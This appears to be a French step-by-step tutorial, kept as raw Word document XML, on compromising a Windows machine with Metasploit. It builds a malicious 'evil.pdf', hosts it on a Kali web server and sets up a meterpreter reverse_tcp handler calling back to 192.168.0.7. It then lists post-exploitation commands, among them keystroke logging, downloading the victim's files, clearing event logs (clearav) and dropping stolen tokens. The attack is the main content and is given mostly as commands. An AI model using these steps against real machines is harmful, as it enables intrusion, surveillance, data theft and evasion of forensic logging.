                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="65733" b="2671"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1066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C3D9F">
        <w:t xml:space="preserve">Pour créer notre fichier virus PDF on lance la commande </w:t>
      </w:r>
      <w:r w:rsidR="004C3D9F" w:rsidRPr="006A28F6">
        <w:rPr>
          <w:rStyle w:val="CONSOLECar"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="004C3D9F">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B00C4" w14:textId="4F055CBC" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="71379546" w14:textId="397D608A" w:rsidR="004C3D9F" w:rsidRDefault="006A28F6" w:rsidP="006A28F6">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Notre fichier est donc créé et enregistré sur le chemin ci-dessus. Nous allons le déplacer dans le dossier html avec la commande suivante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED6F78" w14:textId="739F35C6" w:rsidR="006A28F6" w:rsidRDefault="006A28F6" w:rsidP="006A28F6">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="006A28F6">
        <w:t xml:space="preserve">sudo mv </w:t>
      </w:r>
      <w:r>
        <w:t>/home/kali/.msf4/local/evil.pdf</w:t>
      </w:r>
      <w:r w:rsidRPr="006A28F6">
        <w:t xml:space="preserve"> /var/www/html/evil.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0642913A" w14:textId="27DFC840" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="5AFF1153" w14:textId="72108E79" w:rsidR="004C3D9F" w:rsidRDefault="002E213C" w:rsidP="004C3D9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="019D641A" wp14:editId="6350A7F4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>461645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3219450" cy="333375"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-128" y="-1234"/>
                <wp:lineTo x="-128" y="22217"/>
                <wp:lineTo x="21600" y="22217"/>
                <wp:lineTo x="21600" y="-1234"/>
                <wp:lineTo x="-128" y="-123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19450" cy="333375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Une fois le fichier déplacé dans le dossier html, on se rend sur un navigateur internet depuis la machine victime et on entre l’adresse IP de la machine pirate suivi du nom du fichier PDF.</w:t>
      </w:r>
      <w:r w:rsidRPr="002E213C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295F4E07" w14:textId="5BA8B439" w:rsidR="004C3D9F" w:rsidRDefault="002E213C" w:rsidP="004C3D9F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Depuis la page internet, on enregistre le fichier PDF sur le bureau (par exemple).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7216E2C5" w14:textId="1B73B6D5" w:rsidR="002E213C" w:rsidRDefault="002E213C" w:rsidP="002E213C">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Pour préparer la connexion entre les deux machines (handler) nous devons exécuter les commandes ci-dessous sur la machine kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4139BB0E" w14:textId="418C0516" w:rsidR="002E213C" w:rsidRDefault="002E213C" w:rsidP="002E213C">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="002E213C">
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F8ECD5" w14:textId="79206AA2" w:rsidR="004C3D9F" w:rsidRDefault="00BC4025" w:rsidP="00BC4025">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC4025">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA7C1A2" w14:textId="4EB704D7" w:rsidR="00BC4025" w:rsidRDefault="00BC4025" w:rsidP="00BC4025">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC4025">
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E419B4C" w14:textId="0A5E2910" w:rsidR="00BC4025" w:rsidRDefault="00BC4025" w:rsidP="00BC4025">
      <w:pPr>
        <w:pStyle w:val="CONSOLE"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="143CDAAA" wp14:editId="595A045B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1033780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5762819" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20538"/>
                <wp:lineTo x="21564" y="20538"/>
                <wp:lineTo x="21564" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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rotWithShape="1">
                    <a:blip r:embed="rId17" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="11409" t="79071" r="8235" b="6525"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5762819" cy="5810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2512" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28CFA754" wp14:editId="047EA35F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>252730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21073"/>
                <wp:lineTo x="21500" y="21073"/>
                <wp:lineTo x="21500" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId18" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="71943"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="781050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA98809" w14:textId="1B8CF9F7" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="153D0EA3" w14:textId="332C2D66" w:rsidR="004C3D9F" w:rsidRDefault="00BC4025" w:rsidP="004C3D9F">
      <w:r>
        <w:t>Maintenant on peut lancer le fichier PDF depuis la machine victime et enregistrer le fichier demandé par la fenêtre pop-up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB90D3" w14:textId="56FECB53" w:rsidR="00BC4025" w:rsidRDefault="00BC4025" w:rsidP="004C3D9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="588F3E79" wp14:editId="6B3260C8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="3524250"/>
            <wp:effectExtent l="19050" t="19050" r="11430" b="19050"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-71" y="-117"/>
                <wp:lineTo x="-71" y="21600"/>
                <wp:lineTo x="21571" y="21600"/>
                <wp:lineTo x="21571" y="-117"/>
                <wp:lineTo x="-71" y="-117"/>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19" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="709" b="11834"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3524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Le message d’erreur ci-dessous apparaît, il suffit de cliquer sur </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC4025">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F44D7F8" w14:textId="7F1E217A" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="41F74419" w14:textId="45FC59CF" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="7D0E3529" w14:textId="09FA2958" w:rsidR="004C3D9F" w:rsidRDefault="0018269E" w:rsidP="004C3D9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BE9C09B" wp14:editId="6FEFF6D9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>205105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="1042670"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21311"/>
                <wp:lineTo x="21500" y="21311"/>
                <wp:lineTo x="21500" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId20" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="68313"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1042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On peut observer que du côté de la machine kali, la connexion est bien initialisée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240A50F" w14:textId="3D79F008" w:rsidR="0018269E" w:rsidRDefault="0018269E" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="7DFCFF28" w14:textId="65EB0DF7" w:rsidR="004C3D9F" w:rsidRDefault="0018269E" w:rsidP="004C3D9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="583778F5" wp14:editId="0583BC7D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>421640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4972050" cy="2686050"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-83" y="-153"/>
                <wp:lineTo x="-83" y="21600"/>
                <wp:lineTo x="21600" y="21600"/>
                <wp:lineTo x="21600" y="-153"/>
                <wp:lineTo x="-83" y="-153"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="24800"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4972050" cy="268605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t xml:space="preserve">La session meterpreter est bien ouverte, on peut donc exécuter la commande </w:t>
      </w:r>
      <w:r w:rsidRPr="0018269E">
        <w:rPr>
          <w:rStyle w:val="CONSOLECar"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pour afficher la liste des différentes options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFD94A" w14:textId="238950BC" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="2A8B36C8" w14:textId="39C156DF" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="492E760A" w14:textId="13E56516" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="5B9180BC" w14:textId="7804872F" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="60C2FC93" w14:textId="33607FD3" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="18149520" w14:textId="68A9AD70" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="506F8019" w14:textId="609213D3" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="5F0F7033" w14:textId="6E50399A" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="16BECA6D" w14:textId="30686647" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="302891DA" w14:textId="1F702CCB" w:rsidR="004C3D9F" w:rsidRDefault="004C3D9F" w:rsidP="004C3D9F"/>
    <w:p w14:paraId="2D731DFF" w14:textId="2955BDF6" w:rsidR="004C3D9F" w:rsidRDefault="00B255A1" w:rsidP="004C3D9F">
      <w:r>
        <w:t xml:space="preserve">Quelques commandes importantes : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17195FE4" w14:textId="72C5A848" w:rsidR="00B255A1" w:rsidRDefault="00B255A1" w:rsidP="00B255A1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>dir - voir les fichiers du bureau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D5B477" w14:textId="46008947" w:rsidR="00B255A1" w:rsidRDefault="00B255A1" w:rsidP="00B255A1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ps - voir les processus en cours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F48B4" w14:textId="24624604" w:rsidR="00B255A1" w:rsidRDefault="00B255A1" w:rsidP="00B255A1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>keyboard_send - envoyer des commandes de touches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924D587" w14:textId="2522DA5F" w:rsidR="00B255A1" w:rsidRDefault="00B255A1" w:rsidP="00B255A1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>keyscan_start - commencer un scan de clavier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45203279" w14:textId="02D3737F" w:rsidR="00B255A1" w:rsidRDefault="00B255A1" w:rsidP="00B255A1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">nom du processus </w:t>
      </w:r>
      <w:r>
        <w:t>process - fermer un processus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D024F95" w14:textId="0014D82D" w:rsidR="004C3D9F" w:rsidRDefault="00330D07" w:rsidP="004C3D9F">
      <w:r>
        <w:t>Quelques autres commandes :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8960" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="70" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1240"/>
        <w:gridCol w:w="7720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="2CAACCFA"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000000" w:fill="0070C0"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26649F0D"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7720" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="0070C0"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D367170"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Commandes du système de fichiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="1F1040ED"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2F864CE4"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cat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4E4097E6"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Lire et diffuser le contenu d'un fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="6F19D921"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4D978CE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cd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4A064F37"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Modifier le répertoire sur la victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="212AF84E"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4DABB342"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del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4F08D6F3"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Supprimer un fichier sur la victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="0C58ABA1"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08847B84"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download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5D832CC0"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Téléchargez un fichier du système de la victime vers le système de l'attaquant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="60B648F1"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40BCE5DA"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edit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29CAB60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Éditer un fichier avec vim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="6BB08B0B"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4C191EF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getlwd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7AC4D1C6"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 le répertoire local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="39872CFB"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6ED3176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getwd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3335FF12"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 le répertoire de travail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="423DEA02"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11D5720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lcd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44852088"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Changer le répertoire local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="275273C7"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5C471814"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lpwd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2E73B0C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 le répertoire local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="38B37FD4"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213061D3"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">ls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5825AEE6"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Liste des fichiers dans le répertoire actuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="3A992418"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593BAC6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mkdir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6152A537"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Créer un répertoire sur le système de la victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="57A68182"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200A82E3"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pwd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4E4C13F5"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 le répertoire de travail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="2A8ABCFA"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29C33A76"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rm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41A6795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Effacer un fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="65211043"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278094A5"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rmdir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0AD33EE8"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Supprimer le répertoire sur le système de la victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="0399227A"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4079CD35"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upload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1BC22F3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Télécharger un fichier du hacker vers la victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="0908D658"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000000" w:fill="0070C0"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24CC5439"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7720" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="0070C0"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DC7E77F"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Commandes réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="29CDB5D5"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3313B454"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ipconfig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15F9C380"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 les interfaces réseaux avec des informations clés, y compris l'adresse IP,</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="033DFFF9"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53C565EC"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etc.</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56E3FBC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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="07AFC941"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7C91934C"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portfwd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77CCD26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Transféré un port sur le système de la victime vers un service distant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="19AB7346"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7DC87962"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route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0EE59C57"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Afficher ou modifier la table de routage de la victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="19784C97"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000000" w:fill="0070C0"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61720AB6"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7720" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="9BC2E6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="0070C0"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F11D07D" w14:textId="77777777" w:rsidR="00E67504" w:rsidRPr="00E67504" w:rsidRDefault="00E67504" w:rsidP="00E67504">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E67504">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>System Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="29E0704E"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371EF607"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clearav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39D134B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Efface les journaux d'événements sur l'ordinateur de la victime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E67504" w:rsidRPr="00E67504" w14:paraId="0AA0BC97"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224124AC"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drop_token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3828A723"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Dépose un jeton volé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
